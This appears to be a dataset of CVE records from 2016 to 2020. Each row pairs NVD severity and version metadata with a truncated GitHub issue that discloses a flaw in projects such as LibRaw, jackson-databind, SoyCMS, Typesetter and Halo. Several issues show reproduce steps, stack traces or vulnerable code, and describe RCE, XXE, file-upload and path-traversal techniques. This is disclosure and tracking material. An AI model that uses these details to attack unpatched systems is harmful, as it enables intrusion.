CVE-2020-24889 | 2020-09-16T15:15:12.527 | A buffer overflow vulnerability in LibRaw version < 20.0 LibRaw::GetNormalizedModel in src/metadata/normalize_model.cpp may lead to context-dependent arbitrary code execution. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.1,
"confidentialityImpact": "PARTIA... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/LibRaw/LibRaw/issues/334"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://security.gentoo.org/glsa/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libraw:libraw:*:*:*:*:*:*:*:*",
"matchCriteriaId": "290732D9-D09E-4149-AD2C-DCF404A1B24B",
"versionEndExcluding": "0.20.0",
"versionEndIncluding": null,
"versionStartExcludin... | [
"120"
] | 120 | https://github.com/LibRaw/LibRaw/issues/334 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"LibRaw",
"LibRaw"
] | Reproduce steps:
1. compile provided test.c
2. run command:``./test poc``
Stack trace:
```
#0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51
#1 0x00007ffff6fb08b1 in __GI_abort () at abort.c:79
#2 0x00007ffff6ff9907 in __libc_message (action=action@entry=(do_abort | do_backtrace),
... | buffer overflow | https://api.github.com/repos/LibRaw/LibRaw/issues/334/comments | 4 | 2020-08-20T11:30:55Z | 2020-09-24T15:18:58Z | https://github.com/LibRaw/LibRaw/issues/334 | 682,640,677 | 334 | 1,427 |
CVE-2020-24890 | 2020-09-16T15:15:12.603 | libraw 20.0 has a null pointer dereference vulnerability in parse_tiff_ifd in src/metadata/tiff.cpp, which may result in context-dependent arbitrary code execution. Note: this vulnerability occurs only if you compile the software in a certain way | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.6,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/LibRaw/LibRaw/issues/335"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libraw:libraw:0.20.0:*:*:*:*:*:*:*",
"matchCriteriaId": "3D26C9C4-BD7A-454F-96B3-06D1EFC4A5C2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludi... | [
"476"
] | 476 | https://github.com/LibRaw/LibRaw/issues/335 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"LibRaw",
"LibRaw"
] | Reproduce steps:
1. compile provided test.c
2. run command:``./test poc``
Stack trace:
```
#0 0x00007ffff7afdcc7 in LibRaw::parse_tiff_ifd (this=this@entry=0x7ffffff43250, base=<optimized out>, base@entry=0x0)
at src/metadata/tiff.cpp:617
#1 0x00007ffff7ae7d96 in LibRaw::parse_tiff (this=this@entry=0x7ff... | segmentation fault in LibRaw::parse_tiff_ifd | https://api.github.com/repos/LibRaw/LibRaw/issues/335/comments | 5 | 2020-08-20T12:18:12Z | 2021-10-29T11:05:28Z | https://github.com/LibRaw/LibRaw/issues/335 | 682,668,248 | 335 | 1,428 |
CVE-2020-24750 | 2020-09-17T19:15:13.580 | FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to com.pastdev.httpcomponents.configuration.JndiConfiguration. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/FasterXML/jackson-databind/commit/ad5a630174f08d279504bc51ebba8772fd71b86b"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch",
"Third Party... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4892ABAA-57A0-43D3-965C-2D7F4A8A6024",
"versionEndExcluding": "2.6.7.5",
"versionEndIncluding": null,
"versio... | [
"502"
] | 502 | https://github.com/FasterXML/jackson-databind/issues/2798 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"FasterXML",
"jackson-databind"
] | Another gadget type(s) reported regarding class(es) of `com.pastdev.httpcomponents:configuration`. library.
See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 for description of the general problem.
Mitre id: CVE-2020-24750
Reporter(s): Al1ex@knownsec
Fix ... | Block one more gadget type (com.pastdev.httpcomponents, CVE-2020-24750) | https://api.github.com/repos/FasterXML/jackson-databind/issues/2798/comments | 2 | 2020-07-16T17:25:52Z | 2021-06-22T04:03:19Z | https://github.com/FasterXML/jackson-databind/issues/2798 | 658,400,094 | 2,798 | 1,430 |
CVE-2020-25750 | 2020-09-18T04:15:12.127 | An issue was discovered in DotPlant2 before 2020-09-14. In class Pay2PayPayment in payment/Pay2PayPayment.php, there is an XXE vulnerability in the checkResult function. The user input ($_POST['xml']) is used for simplexml_load_string without sanitization. NOTE: This vulnerability only affects products that are no long... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/DevGroup-ru/dotplant2/issues/400"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dotplant:dotplant2:*:*:*:*:*:*:*:*",
"matchCriteriaId": "78887E78-21B0-4AD6-83B6-E600313E263A",
"versionEndExcluding": "2020-09-14",
"versionEndIncluding": null,
"versionStar... | [
"611"
] | 611 | https://github.com/DevGroup-ru/dotplant2/issues/400 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"DevGroup-ru",
"dotplant2"
] | In class Pay2PayPayment(application\components\payment\Pay2PayPayment.php), there is an XXE vulnerability in _checkResult_ function.
```php
public function checkResult($hash = '')
{
if (isset($_POST['xml'], $_POST['sign'])) {
$xml = base64_decode(str_replace(' ', '+', $_POST['xml']));
... | XXE Vulnerability | https://api.github.com/repos/DevGroup-ru/dotplant2/issues/400/comments | 1 | 2020-09-13T13:11:04Z | 2020-09-19T08:09:56Z | https://github.com/DevGroup-ru/dotplant2/issues/400 | 700,567,445 | 400 | 1,431 |
CVE-2020-25756 | 2020-09-18T05:15:13.197 | A buffer overflow vulnerability exists in the mg_get_http_header function in Cesanta Mongoose 6.18 due to a lack of bounds checking. A crafted HTTP header can exploit this bug. NOTE: a committer has stated "this will not happen in practice. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mongoose/issues/1135"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Part... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mongoose:6.18:*:*:*:*:*:*:*",
"matchCriteriaId": "1F4949BC-D04D-4DB8-9E7E-4459648D712E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | [
"120"
] | 120 | https://github.com/cesanta/mongoose/issues/1135 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"cesanta",
"mongoose"
] | A buffer overflow error in mg_get_http_header function in mongoose/src/mg_http.c in Mongoose 6.18, where header_names and header_values have a bound of (MG_MAX_HTTP_HEADERS); however, there is no check to ensure that the loop does not exceed the upper bound. A Maliciously crafted http header can trigger this bug. To f... | A buffer overflow error in mg_get_http_header | https://api.github.com/repos/cesanta/mongoose/issues/1135/comments | 4 | 2020-08-12T22:11:29Z | 2020-09-19T07:43:13Z | https://github.com/cesanta/mongoose/issues/1135 | 678,010,053 | 1,135 | 1,432 |
CVE-2020-15188 | 2020-09-18T17:15:12.503 | SOY CMS 3.0.2.327 and earlier is affected by Unauthenticated Remote Code Execution (RCE). The allows remote attackers to execute any arbitrary code when the inquiry form feature is enabled by the service. The vulnerability is caused by unserializing the form without any restrictions. This was fixed in 3.0.2.328. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/inunosinsi/soycms/issues/10"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:brassica:soy_cms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DE978394-A82D-43E0-AE72-36ABB7FBB3F9",
"versionEndExcluding": "3.0.2.328",
"versionEndIncluding": null,
"versionStartEx... | [
"502"
] | 502 | https://github.com/inunosinsi/soycms/issues/10 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"inunosinsi",
"soycms"
] | ## Title
Unauthenticated Remote Code Execution (RCE) in SoyCMS
## Summary
Severity: Critical
SoyCMS 3.0.2 and earlier is affected by Unauthenticated Remote Code Execution (RCE). The allows remote attackers to execute any arbitrary code when the inquiry form feature is enabled by the website. The vulnerabili... | Unauthenticated Remote Code Execution (RCE) in SoyCMS | https://api.github.com/repos/inunosinsi/soycms/issues/10/comments | 1 | 2020-09-14T12:06:36Z | 2020-09-16T06:49:32Z | https://github.com/inunosinsi/soycms/issues/10 | 701,036,570 | 10 | 1,433 |
CVE-2020-15189 | 2020-09-18T18:15:16.863 | SOY CMS 3.0.2 and earlier is affected by Remote Code Execution (RCE) using Unrestricted File Upload. Cross-Site Scripting(XSS) vulnerability that was used in CVE-2020-15183 can be used to increase impact by redirecting the administrator to access a specially crafted page. This vulnerability is caused by insecure config... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Mitigation",
"Third Party Advisory"
],
"url": "https://github.com/inunosinsi/soycms/issues/9"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
]... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:brassica:soy_cms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DE978394-A82D-43E0-AE72-36ABB7FBB3F9",
"versionEndExcluding": "3.0.2.328",
"versionEndIncluding": null,
"versionStartEx... | [
"434"
] | 434 | https://github.com/inunosinsi/soycms/issues/9 | [
"Exploit",
"Mitigation",
"Third Party Advisory"
] | github.com | [
"inunosinsi",
"soycms"
] | ## Title
Remote Code Execution (RCE) in SoyCMS
## Summary
Severity: High
SoyCMS 3.0.2 and earlier is affected by Remote Code Execution (RCE) using Unrestricted File Upload. Cross-Site Scripting(XSS) vulnerability that was reported earlier can be chained in order to perform a successful remote code execution... | Remote Code Execution (RCE) in SoyCMS | https://api.github.com/repos/inunosinsi/soycms/issues/9/comments | 0 | 2020-09-14T12:05:06Z | 2020-09-16T06:57:59Z | https://github.com/inunosinsi/soycms/issues/9 | 701,035,586 | 9 | 1,434 |
CVE-2020-25790 | 2020-09-19T21:15:12.140 | Typesetter CMS 5.x through 5.1 allows admins to upload and execute arbitrary PHP code via a .php file inside a ZIP archive. NOTE: the vendor disputes the significance of this report because "admins are considered trustworthy"; however, the behavior "contradicts our security policy" and is being fixed for 5.2 | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/159503/Typesetter-CMS-5.1-Remote-Code-Execution.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:typesettercms:typesetter:*:*:*:*:*:*:*:*",
"matchCriteriaId": "37ADABCC-CA0E-4860-8A02-27E51BCE0B19",
"versionEndExcluding": null,
"versionEndIncluding": "5.1",
"versionStart... | [
"434"
] | 434 | https://github.com/Typesetter/Typesetter/issues/674 | [
"Third Party Advisory"
] | github.com | [
"Typesetter",
"Typesetter"
] | Hello all, I was testing the upload mechanism, and I found that it is possible to bypass the protection for .php files by placing the .php inside a .zip file and extracting it. Once this is done, it is possible to execute commands on the machine using a malicious php file (webshell). Okay, that and the viability decrea... | Bypass File Uploading restrictions leads to Command Execution | https://api.github.com/repos/Typesetter/Typesetter/issues/674/comments | 10 | 2020-09-18T17:44:24Z | 2020-09-19T14:26:52Z | https://github.com/Typesetter/Typesetter/issues/674 | 704,549,132 | 674 | 1,435 |
CVE-2020-25791 | 2020-09-19T21:15:12.203 | An issue was discovered in the sized-chunks crate through 0.6.2 for Rust. In the Chunk implementation, the array size is not checked when constructed with unit(). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/bodil/sized-chunks/issues/11"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://rustsec.org/advisories/RUSTSEC... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sized-chunks_project:sized-chunks:*:*:*:*:*:rust:*:*",
"matchCriteriaId": "C880966D-057C-4626-9644-7C386CB9FBBD",
"versionEndExcluding": null,
"versionEndIncluding": "0.6.2",
... | [
"129"
] | 129 | https://github.com/bodil/sized-chunks/issues/11 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"bodil",
"sized-chunks"
] | Hello, we have noticed a soundness issue and/or a potential security vulnerability in this crate while performing a security scan on crates.io.
# Description
Chunk:
* Array size is not checked when constructed with `unit()` and `pair()`.
* Array size is not checked when constructed with `From<InlineArray<A, T>>`.
* ... | Multiple soundness issues in Chunk and InlineArray | https://api.github.com/repos/bodil/sized-chunks/issues/11/comments | 5 | 2020-09-06T22:04:56Z | 2021-02-14T12:05:33Z | https://github.com/bodil/sized-chunks/issues/11 | 694,545,650 | 11 | 1,436 |
CVE-2020-25821 | 2020-09-23T04:15:11.133 | peg-markdown 0.4.14 has a NULL pointer dereference in process_raw_blocks in markdown_lib.c. NOTE: This vulnerability only affects products that are no longer supported by the maintainer | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/jgm/peg-markdown/issues/43"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:peg-markdown_project:peg-markdown:0.4.14:*:*:*:*:*:*:*",
"matchCriteriaId": "DA66F7CE-832C-4C4E-9130-D29FCA545582",
"versionEndExcluding": null,
"versionEndIncluding": null,
... | [
"476"
] | 476 | https://github.com/jgm/peg-markdown/issues/43 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"jgm",
"peg-markdown"
] |
Hi,
While fuzzing peg-markdown with Honggfuzz, I found a NULL pointer dereference in the process_raw_blocks() function.
Attaching a reproducer (gzipped so GitHub accepts it): [test01.md.gz](https://github.com/jgm/peg-markdown/files/5254664/test01.md.gz)
Issue can be reproduced by running:
```
markdown te... | NULL pointer dereference in the process_raw_blocks() function | https://api.github.com/repos/jgm/peg-markdown/issues/43/comments | 2 | 2020-09-21T10:01:11Z | 2021-03-27T09:00:24Z | https://github.com/jgm/peg-markdown/issues/43 | 705,455,420 | 43 | 1,437 |
CVE-2020-24213 | 2020-09-23T15:15:15.223 | An integer overflow was discovered in YGOPro ygocore v13.51. Attackers can use it to leak the game server thread's memory. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Fluorohydride/ygopro/issues/2314"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Th... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ygopro:ygocore:1.035.1:*:*:*:*:*:*:*",
"matchCriteriaId": "DB7E411F-6738-424D-A211-AF076FDD2FFA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclu... | [
"190"
] | 190 | https://github.com/Fluorohydride/ygopro/issues/2314 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Fluorohydride",
"ygopro"
] | #### Memory leak
This vulnerability happened when the function "SingleDuel::UpdateDeck" and "SingleDuel::PlayerReady" been used.
When the player sends a package with error 'mainc' size and 'sidec' size, the function "SingleDuel::UpdateDeck" haven't check those parameters is legal or not. Then this function will cal... | Security Issue: Memory leak. | https://api.github.com/repos/Fluorohydride/ygopro/issues/2314/comments | 11 | 2020-07-31T14:38:56Z | 2024-05-31T13:52:07Z | https://github.com/Fluorohydride/ygopro/issues/2314 | 669,885,569 | 2,314 | 1,438 |
CVE-2020-15930 | 2020-09-24T19:15:11.713 | An XSS issue in Joplin desktop 1.0.190 to 1.0.245 allows arbitrary code execution via a malicious HTML embed tag. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "http://packetstormsecurity.com/files/159316/Joplin-1.0.245-Cross-Site-Scripting-Code-Execution.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "h... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:joplin_project:joplin:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7A337333-8FE3-4A1D-8039-A26AC351AA07",
"versionEndExcluding": null,
"versionEndIncluding": "1.0.245",
"versionStar... | [
"79"
] | 79 | https://github.com/laurent22/joplin/issues/3552 | [
"Third Party Advisory"
] | github.com | [
"laurent22",
"joplin"
] | I'm opening this issue for future disclosure regarding the vulnerability reported via e-mail. | Security Vulnerability | https://api.github.com/repos/laurent22/joplin/issues/3552/comments | 8 | 2020-07-23T21:23:41Z | 2020-09-27T18:25:53Z | https://github.com/laurent22/joplin/issues/3552 | 664,774,612 | 3,552 | 1,439 |
CVE-2016-11086 | 2020-09-24T20:15:12.257 | lib/oauth/consumer.rb in the oauth-ruby gem through 0.5.4 for Ruby does not verify server X.509 certificates if a certificate bundle cannot be found, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/oauth-xx/oauth-ruby/issues/137"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://git... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:oauth-ruby_project:oauth-ruby:*:*:*:*:*:ruby:*:*",
"matchCriteriaId": "2F962A48-C937-46DB-A97B-C1D71BC8C3DA",
"versionEndExcluding": null,
"versionEndIncluding": "0.5.4",
"ve... | [
"295"
] | 295 | https://github.com/oauth-xx/oauth-ruby/issues/137 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"oauth-xx",
"oauth-ruby"
] | While analysing the source code of some third party libraries we use in our projects, I found an issue with the way certificate validation is handled in this library. If the certificate bundle cannot be found on the file system at three known/specified locations, then it silently falls back to a mode (i.e. `OpenSSL::SS... | Certificate and chain not validated if certificate bundle cannot be found | https://api.github.com/repos/oauth-xx/oauth-ruby/issues/137/comments | 4 | 2016-12-01T21:59:30Z | 2021-10-31T22:28:41Z | https://github.com/oauth-xx/oauth-ruby/issues/137 | 192,974,378 | 137 | 1,440 |
CVE-2019-20921 | 2020-09-30T18:15:18.007 | bootstrap-select before 1.13.6 allows Cross-Site Scripting (XSS). It does not escape title values in OPTION elements. This may allow attackers to execute arbitrary JavaScript in a victim's browser. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/advisories/GHSA-9r7h-6639-v5mw"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/snapappointments/bootstrap-select/... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:snapappointments:bootstrap-select:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "72F562DB-EA28-45BF-BFBA-FFC00C570092",
"versionEndExcluding": "1.13.6",
"versionEndIncluding": null,
... | [
"79"
] | 79 | https://github.com/snapappointments/bootstrap-select/issues/2199 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"snapappointments",
"bootstrap-select"
] | The bootstrap-select does not respect escaped content correctly. Instead the escaped content is rendered as it would not be escaped.
Sample can be seen here: https://jsfiddle.net/b1dhf8ec/2/ | Escaped tags parsed as non-escaped in title and data-content | https://api.github.com/repos/snapappointments/bootstrap-select/issues/2199/comments | 7 | 2019-02-14T11:10:30Z | 2020-10-01T03:02:55Z | https://github.com/snapappointments/bootstrap-select/issues/2199 | 410,247,803 | 2,199 | 1,441 |
CVE-2020-21244 | 2020-09-30T18:15:23.817 | An issue was discovered in FrontAccounting 2.4.7. There is a Directory Traversal vulnerability that can empty folder via admin/inst_lang.php. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.5,
"confidentialityImpact": "NONE"... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/FrontAccountingERP/FA/issues/40"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Thi... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:frontaccounting:frontaccounting:2.4.7:*:*:*:*:*:*:*",
"matchCriteriaId": "525A049E-5790-4686-AAB0-580648615E28",
"versionEndExcluding": null,
"versionEndIncluding": null,
"ve... | [
"22"
] | 22 | https://github.com/FrontAccountingERP/FA/issues/40 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"FrontAccountingERP",
"FA"
] | ### test version:2.4.7
### 0x00 description
Frontaccounting is using the function clean_file_name() to eliminate '../' in the file name submitted by the user to avoid directory traversal vulnerability.

- [x] [Halo BBS](https://bbs.halo.run)
- [x] [Github Wiki ](https://github.com/halo-dev/halo/wiki/4.... | A Zip Slip Directory Traversal Vulnerability in the backend | https://api.github.com/repos/halo-dev/halo/issues/418/comments | 0 | 2019-12-11T10:35:33Z | 2019-12-12T16:19:06Z | https://github.com/halo-dev/halo/issues/418 | 536,283,129 | 418 | 1,443 |
CVE-2020-21524 | 2020-09-30T18:15:24.023 | There is a XML external entity (XXE) vulnerability in halo v1.1.3, The function of importing other blogs in the background(/api/admin/migrations/wordpress) needs to parse the xml file, but it is not used for security defense, This vulnerability can detect the intranet, read files, enable ddos attacks, etc. exp:https://... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/halo-dev/halo/issues/423"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Part... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:halo:halo:1.1.3:-:*:*:*:*:*:*",
"matchCriteriaId": "1CB4664A-F423-4172-B79D-C082E4DDBC76",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": ... | [
"611"
] | 611 | https://github.com/halo-dev/halo/issues/423 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"halo-dev",
"halo"
] | <!--
如果你不认真勾选下面的内容,我可能会直接关闭你的 Issue。
提问之前,建议先阅读 https://github.com/ruby-china/How-To-Ask-Questions-The-Smart-Way
-->
**I am sure I have checked**
- [x] [Halo User Guide Documentation ](https://halo.run/docs)
- [x] [Halo BBS](https://bbs.halo.run)
- [x] [Github Wiki ](https://github.com/halo-dev/halo/wiki/4.... | A XML external entity (XXE) vulnerability in the backend | https://api.github.com/repos/halo-dev/halo/issues/423/comments | 1 | 2019-12-11T11:44:59Z | 2019-12-12T17:08:25Z | https://github.com/halo-dev/halo/issues/423 | 536,318,212 | 423 | 1,444 |
CVE-2020-21525 | 2020-09-30T18:15:24.083 | Halo V1.1.3 is affected by: Arbitrary File reading. In an interface that reads files in halo v1.1.3, a directory traversal check is performed on the input path parameter, but the startsWith function can be used to bypass it. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/halo-dev/halo/issues/420"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Part... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:halo:halo:1.1.3:*:*:*:*:*:*:*",
"matchCriteriaId": "6AAE0537-C39F-4121-AA74-28235A4DC07A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": ... | [
"22"
] | 22 | https://github.com/halo-dev/halo/issues/420 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"halo-dev",
"halo"
] | <!--
如果你不认真勾选下面的内容,我可能会直接关闭你的 Issue。
提问之前,建议先阅读 https://github.com/ruby-china/How-To-Ask-Questions-The-Smart-Way
-->
**I am sure I have checked**
- [x] [Halo User Guide Documentation ](https://halo.run/docs)
- [x] [Halo BBS](https://bbs.halo.run)
